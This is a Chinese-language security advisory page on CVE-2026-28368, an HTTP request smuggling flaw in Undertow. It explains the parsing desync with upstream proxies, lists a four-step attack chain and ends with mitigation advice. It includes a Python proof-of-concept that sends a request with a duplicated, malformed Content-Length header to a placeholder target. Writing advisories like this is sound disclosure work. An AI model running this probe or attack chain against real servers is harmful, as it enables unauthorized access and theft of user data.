CVE-2026-28368 CVSS 8.7 高危

CVE-2026-28368 Undertow HTTP请求走私漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28368

漏洞类型

HTTP请求走私

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Undertow

漏洞概述

Undertow组件中存在严重的安全设计缺陷，该漏洞源于Undertow与上游代理对HTTP请求头部名称的解析逻辑存在差异。远程攻击者无需任何身份认证即可利用此差异，精心构造特殊的恶意请求包。这种解析不一致性可被用于发起HTTP请求走私攻击，从而成功绕过前端安全控制，访问未授权的敏感资源，对系统数据的机密性和完整性造成严重影响。

技术细节

该漏洞的技术原理基于HTTP请求走私中的解析差异（Request Smuggling via Desync）。具体来说，Undertow在处理HTTP请求流时，对某些特殊字符或格式在Header Name中的处理逻辑与标准或常见上游代理（如Nginx、HAProxy）不一致。例如，代理可能允许带空格或特殊符号的头部名称并将其规范化，而Undertow可能将其视为无效忽略，或者反之。这种对请求结构的认知不同步（Desync），导致攻击者可以构造一个在代理看来是一个请求，但在Undertow看来是两个请求的数据包。攻击者利用这种歧义，可以在未经授权的情况下将恶意请求注入到其他用户的连接中，从而窃取Cookie、执行XSS攻击或绕过安全检查，完全控制后续请求的内容。

攻击链分析

STEP 1

侦察

攻击者识别目标系统使用Undertow作为后端服务器，并确认存在上游代理（如Nginx或Apache）。

STEP 2

漏洞探测

攻击者发送特制的测试请求，包含各种畸形头部名称，以探测代理与Undertow在解析上的差异（Desync）。

STEP 3

请求走私

一旦发现解析差异，攻击者构造恶意的HTTP请求，利用CL/TE不一致或头部混淆，将恶意请求“走私”进后端TCP连接。

STEP 4

绕过与利用

走私的请求被后端Undertow误认为是下一个合法请求，从而允许攻击者绕过安全检查，访问未授权资源或窃取用户数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Target configuration
host = "target.example.com"
port = 80

def send_smuggling_request():
    """
    PoC for HTTP Request Smuggling via Header Parsing Discrepancy.
    This attempts to send a request that the proxy interprets differently
    than the Undertow backend, potentially smuggling the second request.
    """
    # Constructing a request with a malformed header name
    # The space before 'Content-Length' might be handled differently
    # by the proxy vs Undertow.
    payload = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Length: 6\r\n"
        " Content-Length: 4\r\n"  # Malformed header: leading space
        "\r\n"
        "123456"
    )

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(payload.encode())
        
        # Receive response to observe behavior
        response = s.recv(4096)
        print("Response received:")
        print(response.decode())
        s.close()
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    send_smuggling_request()

影响范围

Undertow (具体受影响版本请参考RedHat官方通告)

防御指南

临时缓解措施

建议立即部署官方提供的补丁程序进行修复。在无法立即升级的情况下，应检查并调整上游代理服务器的配置，确保其对HTTP头部的解析与Undertow保持一致，或启用严格的请求校验机制以拦截包含畸形头部名称的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表